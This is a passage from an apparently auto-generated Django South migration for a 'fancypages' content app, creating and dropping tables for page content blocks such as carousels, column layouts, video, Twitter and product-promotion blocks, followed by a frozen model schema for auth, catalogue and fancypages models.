('image_10', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_10', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
))
db.send_create_signal('fancypages', ['CarouselBlock'])
# Adding model 'PageNavigationBlock'
db.create_table('fancypages_pagenavigationblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['PageNavigationBlock'])
# Adding model 'PrimaryNavigationBlock'
db.create_table('fancypages_primarynavigationblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['PrimaryNavigationBlock'])
# Adding model 'TabBlock'
db.create_table('fancypages_tabblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['TabBlock'])
# Adding model 'TwoColumnLayoutBlock'
db.create_table('fancypages_twocolumnlayoutblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('left_width', self.gf('django.db.models.fields.PositiveIntegerField')(default=6, max_length=3)),
))
db.send_create_signal('fancypages', ['TwoColumnLayoutBlock'])
# Adding model 'ThreeColumnLayoutBlock'
db.create_table('fancypages_threecolumnlayoutblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['ThreeColumnLayoutBlock'])
# Adding model 'FourColumnLayoutBlock'
db.create_table('fancypages_fourcolumnlayoutblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['FourColumnLayoutBlock'])
# Adding model 'VideoBlock'
db.create_table('fancypages_videoblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('source', self.gf('django.db.models.fields.CharField')(max_length=50)),
('video_code', self.gf('django.db.models.fields.CharField')(max_length=50)),
))
db.send_create_signal('fancypages', ['VideoBlock'])
# Adding model 'TwitterBlock'
db.create_table('fancypages_twitterblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('username', self.gf('django.db.models.fields.CharField')(max_length=50)),
('max_tweets', self.gf('django.db.models.fields.PositiveIntegerField')(default=5)),
))
db.send_create_signal('fancypages', ['TwitterBlock'])
# Adding model 'SingleProductBlock'
db.create_table('fancypages_singleproductblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('product', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['catalogue.Product'], null=True)),
))
db.send_create_signal('fancypages', ['SingleProductBlock'])
# Adding model 'HandPickedProductsPromotionBlock'
db.create_table('fancypages_handpickedproductspromotionblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('promotion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['promotions.HandPickedProductList'], null=True)),
))
db.send_create_signal('fancypages', ['HandPickedProductsPromotionBlock'])
# Adding model 'AutomaticProductsPromotionBlock'
db.create_table('fancypages_automaticproductspromotionblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('promotion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['promotions.AutomaticProductList'], null=True)),
))
db.send_create_signal('fancypages', ['AutomaticProductsPromotionBlock'])
# Adding model 'OfferBlock'
db.create_table('fancypages_offerblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('offer', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['offer.ConditionalOffer'], null=True)),
))
db.send_create_signal('fancypages', ['OfferBlock'])
def backwards(self, orm):
# Removing unique constraint on 'Container', fields ['name', 'content_type', 'object_id']
db.delete_unique('fancypages_container', ['name', 'content_type_id', 'object_id'])
# Deleting model 'FancyPage'
db.delete_table('fancypages_fancypage')
# Removing M2M table for field visibility_types on 'FancyPage'
db.delete_table('fancypages_fancypage_visibility_types')
# Deleting model 'PageType'
db.delete_table('fancypages_pagetype')
# Deleting model 'VisibilityType'
db.delete_table('fancypages_visibilitytype')
# Deleting model 'Container'
db.delete_table('fancypages_container')
# Deleting model 'OrderedContainer'
db.delete_table('fancypages_orderedcontainer')
# Deleting model 'ContentBlock'
db.delete_table('fancypages_contentblock')
# Deleting model 'TextBlock'
db.delete_table('fancypages_textblock')
# Deleting model 'TitleTextBlock'
db.delete_table('fancypages_titletextblock')
# Deleting model 'ImageBlock'
db.delete_table('fancypages_imageblock')
# Deleting model 'ImageAndTextBlock'
db.delete_table('fancypages_imageandtextblock')
# Deleting model 'CarouselBlock'
db.delete_table('fancypages_carouselblock')
# Deleting model 'PageNavigationBlock'
db.delete_table('fancypages_pagenavigationblock')
# Deleting model 'PrimaryNavigationBlock'
db.delete_table('fancypages_primarynavigationblock')
# Deleting model 'TabBlock'
db.delete_table('fancypages_tabblock')
# Deleting model 'TwoColumnLayoutBlock'
db.delete_table('fancypages_twocolumnlayoutblock')
# Deleting model 'ThreeColumnLayoutBlock'
db.delete_table('fancypages_threecolumnlayoutblock')
# Deleting model 'FourColumnLayoutBlock'
db.delete_table('fancypages_fourcolumnlayoutblock')
# Deleting model 'VideoBlock'
db.delete_table('fancypages_videoblock')
# Deleting model 'TwitterBlock'
db.delete_table('fancypages_twitterblock')
# Deleting model 'SingleProductBlock'
db.delete_table('fancypages_singleproductblock')
# Deleting model 'HandPickedProductsPromotionBlock'
db.delete_table('fancypages_handpickedproductspromotionblock')
# Deleting model 'AutomaticProductsPromotionBlock'
db.delete_table('fancypages_automaticproductspromotionblock')
# Deleting model 'OfferBlock'
db.delete_table('fancypages_offerblock')
models = {
'assets.imageasset': {
'Meta': {'object_name': 'ImageAsset'},
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'default': "''"}),
'height': ('django.db.models.fields.IntegerField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'size': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'width': ('django.db.models.fields.IntegerField', [], {'blank': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': "orm['catalogue.AttributeEntityType']"})
},
'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'})
},
'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': "orm['catalogue.AttributeOptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.ProductAttribute']", 'through': "orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Category']", 'through': "orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': "orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductClass']", 'null': 'True'}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'rating': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Product']", 'symmetrical': 'False', 'through': "orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': "orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductAttribute']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': "orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': "orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'fancypages.automaticproductspromotionblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'AutomaticProductsPromotionBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'promotion': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['promotions.AutomaticProductList']", 'null': 'True'})
},
'fancypages.carouselblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'CarouselBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'image_1': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_10': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_2': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_3': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_4': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_5': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_6': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_7': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_8': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_9': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'link_url_1': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_10': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_2': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_3': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_4': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_5': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_6': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_7': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_8': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_9': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'})
},
'fancypages.container': {
'Meta': {'unique_together': "(('name', 'content_type', 'object_id'),)", 'object_name': 'Container'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
'fancypages.contentblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'ContentBlock'},
'container': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'blocks'", 'to': "orm['fancypages.Container']"}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'fancypages.fancypage': {
'Meta': {'ordering': "['full_name']", 'object_name': 'FancyPage', '_ormbases': ['catalogue.Category']},
'category_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['catalogue.Category']", 'unique': 'True', 'primary_key': 'True'}),
'date_visible_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_visible_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'page_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'pages'", 'null': 'True', 'to': "orm['fancypages.PageType']"}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'draft'", 'max_length': '15'}),
'visibility_types': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['fancypages.VisibilityType']", 'symmetrical': 'False'})
},
'fancypages.fourcolumnlayoutblock': {
'Meta': {'object_name': 'FourColumnLayoutBlock'},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.handpickedproductspromotionblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'HandPickedProductsPromotionBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'promotion': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['promotions.HandPickedProductList']", 'null': 'True'})
},
'fancypages.imageandtextblock': {
'Meta': {'object_name': 'ImageAndTextBlock', '_ormbases': ['fancypages.ContentBlock']},
'alt_text': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'image_asset': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'image_text_blocks'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'default': "'Your text goes here.'", 'max_length': '2000'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'fancypages.imageblock': {
'Meta': {'object_name': 'ImageBlock', '_ormbases': ['fancypages.ContentBlock']},
'alt_text': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'image_asset': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'image_blocks'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'fancypages.offerblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'OfferBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'offer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.ConditionalOffer']", 'null': 'True'})
},
'fancypages.orderedcontainer': {
'Meta': {'object_name': 'OrderedContainer', '_ormbases': ['fancypages.Container']},
'container_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.Container']", 'unique': 'True', 'primary_key': 'True'}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'fancypages.pagenavigationblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'PageNavigationBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.pagetype': {
'Meta': {'object_name': 'PageType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'fancypages.primarynavigationblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'PrimaryNavigationBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.singleproductblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'SingleProductBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']", 'null': 'True'})
},
'fancypages.tabblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'TabBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.textblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'TextBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'default': "'Your text goes here.'"})
},
'fancypages.threecolumnlayoutblock': {
'Meta': {'object_name': 'ThreeColumnLayoutBlock'},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.titletextblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'TitleTextBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'default': "'Your text goes here.'"}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Your title goes here.'", 'max_length': '100'})
},
'fancypages.twitterblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'TwitterBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'max_tweets': ('django.db.models.fields.PositiveIntegerField', [], {'default': '5'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'fancypages.twocolumnlayoutblock': {
'Meta': {'object_name': 'TwoColumnLayoutBlock'},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'left_width': ('django.db.models.fields.PositiveIntegerField', [], {'default': '6', 'max_length': '3'})
},
'fancypages.videoblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'VideoBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'video_code': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'fancypages.visibilitytype': {
'Meta': {'object_name': 'VisibilityType'},
